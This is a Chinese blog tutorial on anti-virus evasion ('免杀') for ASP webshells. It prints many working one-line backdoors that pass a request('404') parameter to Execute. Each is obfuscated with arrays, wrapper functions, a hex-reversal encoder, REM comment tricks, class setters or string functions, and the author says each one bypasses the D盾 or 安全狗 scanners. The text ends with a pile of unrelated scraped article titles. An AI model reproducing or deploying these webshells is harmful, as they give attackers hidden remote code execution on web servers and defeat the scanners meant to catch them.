0x00 前言

现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章

偷偷介绍下公众号:404安全

0x01 目录

数组

函数

加密

注释符

字符串操作

0x02 了解asp一句话

ASP解释器还有:VBScript

ASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//

ASP的执行函数 : Eval 、 Execute 、ExecuteGlobal

0x03 数组

利用数组来免杀,因为我们在php免杀中使用过数组,他的效果还不错,那么我们是否可以利用到asp来,当然答案是肯定的

其中定义数组的方法有多种方式,我们才用最简单方式来看看

dim a(5)

a(0)=request("404")

eXecUTe(a(0))

%>

简单的数组定义D盾就不认识了,为什么我会想到用数组来绕过,因为我发现函数调用的时候D盾不敏感,包括asp,php等

当然你还可以这样用,加上一点循环语句

dim array(1)

dim c

array(1)=request("404")

for each a in array

c = a & ""

next

execute(c)

%>

0x04 函数

这个是那天D盾更新,无意间测试出来的,发现d盾对函数传入不是很敏感

Function b():

b = request("404")

End Function

Function f():

eXecUTe(b())

End Function

f()

%>

0x05 加密

网上随便找了一段加密算法 但是测试发现D盾爆了一级,参数未知

eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600"))

function gw_jiemi(text)

const key="gw"

dim str : str=text

dim str1

dim str2 : str2=strreverse(str)

for i=1 to len(str2) step 4

str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))

next

gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))

end function

%>

既然都提示我们参数的问题了,那么简单的干扰一下吧,连接个空字符

eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600")&"")

function gw_jiemi(text)

const key="gw"

dim str : str=text

dim str1

dim str2 : str2=strreverse(str)

for i=1 to len(str2) step 4

str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))

next

gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))

end function

%>

解密的算法是

function gw_jiami(text)

const key="gw"

dim str : str=key & text

dim str1

dim str2

for i=1 to len(str)

str2=hex(AscW(mid(str,i,1)))

for j=1 to 4-len(str2)

str2="0" & str2

next

str1=str1 & str2

next

gw_jiami=strreverse(str1)

end function

0x06 注释符

通过一个简单的注释符绕过安全狗还是比较简单的,

a = request("404")

b = a REM a

execute(b)

%>

怎么绕过d盾了想了几分钟发现可以这样

%>

0x07 类

在php中我们使用类可以很轻松的绕过,但是asp使用类现在d盾看的很紧,首先看看最简单的类

Class LandGrey

Private Sub Class_Initialize

execute request("404")

End Sub

End Class

Set X = New LandGrey

%>

利用Class_Initialize 初始化就调用我们的函数,但是已经不行了,那么我们简单的变形一下

Class LandGrey

private str_title

public property let setauthor(str)

execute str REM a

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

这个D盾爆出一级,提示未知参数str,怎么绕过呢,我们可以用函数的方式把他包裹起来 跟前面方案一样

Class LandGrey

private str_title

public property let setauthor(str)

execute(str&"")

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

但是提示语句没结束语法问题,那就改改,用括号包裹起来调用,同时利用REM注释后面的内容,d盾就会识别括号里面有内容,从而绕过

Class LandGrey

private str_title

public property let setauthor(str)

execute(str )REM a)

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

前面说过他提示的参数没 赋值 那么我们就定义一个局部变量来赋值吧

Class LandGrey

private str

Private Sub Class_Initialize

str = ""

End Sub

public property let setauthor(str)

execute(str)

end property

End Class

Set a= New LandGrey

a.setauthor= request("404")

%>

0x08 字符串操作

前面php的webshell我们讲过,d盾是杀参数的,我们如何绕过的思路就是在传入参数这里做文章,先来一个简单的

a = request("404")

b = Left(a,99999)

execute(b)

%>

D盾直接爆4级,我们再找个函数包裹一下我们的a字符串,UCase大小写转换

a = request("404")

b = Left(UCase(a),99999)

execute(b)

%>

还是4级,那么我们在后面连接一个空格呢,那么他就能完美绕过

a = request("404")

b = Left(UCase(a)&"",99999)

execute(b)

%>

0x09 总结

虽然asp不是很灵活,但是通过探索还是能发现不少姿势,还是那句话多学多练,我们一起从0开始

shell 免杀aspx_对于asp免杀webshell的一些总结相关推荐

  1. TideSec远控免杀学习一(免杀基础+msfvenom隐藏的参数)

    参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料 免杀技术有一套:https://anhkgg.com/aanti-virus/ ...

  2. 免杀实战之面向PHP的WebShell免杀

    0X00普通的一句话木马 <pre id="PTXkG"><?php eval($_POST['a']); ?> //函数的相似替换 <?php as ...

  3. 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  4. 远控免杀专题(22)-SpookFlare免杀

    转载:https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...

  5. 远控免杀专题(19)-nps_payload免杀

    免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterper ...

  6. 远控免杀专题(9)-Avet免杀(VT免杀率14/71)

    本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...

  7. 免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)

    00. 概述 什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为& ...

  8. 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  9. 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

最新文章

  1. python医学科研中能做什么-非结构化数据-病历智能处理引擎的设计、实现和应用...
  2. 机器学习算法与Python实践之(一)k近邻(KNN)
  3. Android --- Bundle实现数据的读取
  4. Delphi动态事件
  5. php mysql 图像_将图像插入MySQL并使用PHP检索图像
  6. 恐怖谷与深度爵士:计算机艺术能达到人类的高峰吗
  7. 谷歌html弹出ie页面,HTML用JS识别浏览器,IE内核则调用谷歌打开指定链接
  8. python实现自动打卡_python实现腾讯文档自动打卡教程
  9. 【Windows、Git问题】detected dubious ownership in repository 问题解决
  10. 【飞凌嵌入式 OK3399-C+开发板试用体验】开箱上电
  11. Verilog中的Signed Decimal与Signed Magnitude区别
  12. M1芯片实现Kail虚拟机(无Parallels)
  13. 杰里之AI(692X系列)篇
  14. java网盘_和付费网盘说再见,跟着本文自己起个网盘(Java 开源项目)
  15. 偏微分方程数值解法python_基于python求解偏微分方程的有限差分法资料
  16. 精简模式 大师 易水之畔 自动刷冒险任务 刷金币
  17. Mvc请求的生命周期
  18. 机械精度设计与检测|表面粗糙度
  19. PHP使用openoffice实现word,ppt,Excel在线转PDF浏览。windows和linux系统不同的解决方案
  20. 计算机毕业设计Java便利店系统(源码+系统+mysql数据库+lw文档)

热门文章

  1. 面试官:编写一个 SQL 查询,找出每个部门工资第二高的员工
  2. 你们和父亲关系怎么样?
  3. 门当户对的感情真的很重要吗?
  4. 职场pua是什么意思,如何反职场pua,职场pua如何走出来
  5. 明星开店都是稳定赚钱的生活,稳赚不赔
  6. 赚钱有捷径吗?为什么有的人赚钱很容易
  7. 从2000年到2019年
  8. 没人脉,没资源,没背景的人,最好的出路是什么?
  9. IT行业的职员加班到底有没有价值?
  10. 指纹支付为什么没有推广?